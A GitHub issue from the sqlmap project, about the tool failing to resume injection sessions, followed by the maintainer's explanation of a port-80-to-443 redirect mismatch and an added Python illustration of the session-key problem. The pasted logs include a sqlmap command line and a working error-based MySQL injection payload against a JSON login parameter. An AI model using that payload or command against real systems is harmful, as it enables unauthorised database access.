sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Sqlmap Doesn't Resume Injections #3148

Closed riteqylubu closed 6 years ago

riteqylubu commented 6 years ago

python sqlmap.py -r requestfile --dbms=MYSQl --tech=E

First run

[12:37:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:37:23] [INFO] (custom) POST parameter 'JSON username' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
(custom) POST parameter 'JSON username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 388 HTTP(s) requests:

Parameter: JSON username ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: {"username":"sank") OR (SELECT 8115 FROM(SELECT COUNT(),CONCAT(0x71786a7871,(SELECT (ELT(8115=8115,1))),0x7176766271,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("vlnG"="vlnG","password":"f3ed11bbdb94fd9ebdefbaf646ab94d3"}

[12:37:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[12:37:34] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 243 times

Second run

python sqlmap.py -r requestfile --dbms=MYSQl --tech=E

[*] starting at 12:40:23

[12:40:23] [INFO] parsing HTTP request from 'pabloescobar'
JSON data found in POST data. Do you want to process it? [Y/n/q] y
[12:40:25] [INFO] testing connection to the target URL
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n]
[12:40:29] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON username' might be injectable (possible DBMS: 'MySQL')
[12:40:30] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON username' might be vulnerable to cross-site scripting (XSS) attacks
[12:40:30] [INFO] testing for SQL injection on (custom) POST parameter 'JSON username'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

Never ever saves or resumes correctly

stamparm commented 6 years ago

Just to explain what the problem was in the first place. You've put Host: for port 80, while the target redirected you to port 443. I realized with this example that this was indeed a "problem" for sqlmap, as it treated those situations as different targets.
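The mismatch described in the comment above, as an added example that is not part of the thread and is not sqlmap's code: it models why results saved under the redirected origin (port 443) are not found when the next run looks them up under the origin named in the request file (port 80). The hostname `app.example.test`, the sample request and both key functions (`strict_key`, `host_key`) are assumptions made for illustration.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed sample data (not taken from the issue).
REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"username":"u","password":"p"}'
)
REDIRECT_LOCATION = "https://app.example.test/login"

def origin_from_request(raw, scheme="http"):
    """(scheme, host, port) named by the Host header of a raw HTTP request."""
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break  # blank line: end of headers
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            parts = urlsplit("//" + value.strip())  # also handles [IPv6]:port
            return scheme, parts.hostname, parts.port or DEFAULT_PORTS[scheme]
    raise ValueError("request has no Host header")

def origin_from_url(url):
    """(scheme, host, port) of an absolute URL such as a redirect Location."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS[parts.scheme]

def strict_key(origin, parameter):
    """Hypothetical session key that includes scheme and port."""
    return "%s://%s:%d|%s" % (origin + (parameter,))

def host_key(origin, parameter):
    """Hypothetical session key that ignores scheme and port."""
    return "%s|%s" % (origin[1], parameter)

def second_run_resumes(key_func):
    """Run 1 saves under the redirected origin; run 2 looks up the requested one."""
    store = {key_func(origin_from_url(REDIRECT_LOCATION), "username"): "saved result"}
    return key_func(origin_from_request(REQUEST), "username") in store

if __name__ == "__main__":
    print("strict key resumes:", second_run_resumes(strict_key))
    print("host key resumes:", second_run_resumes(host_key))
```

Keying on the hostname alone makes the lookup survive the redirect, at the cost of merging state for distinct services that share a host on different ports.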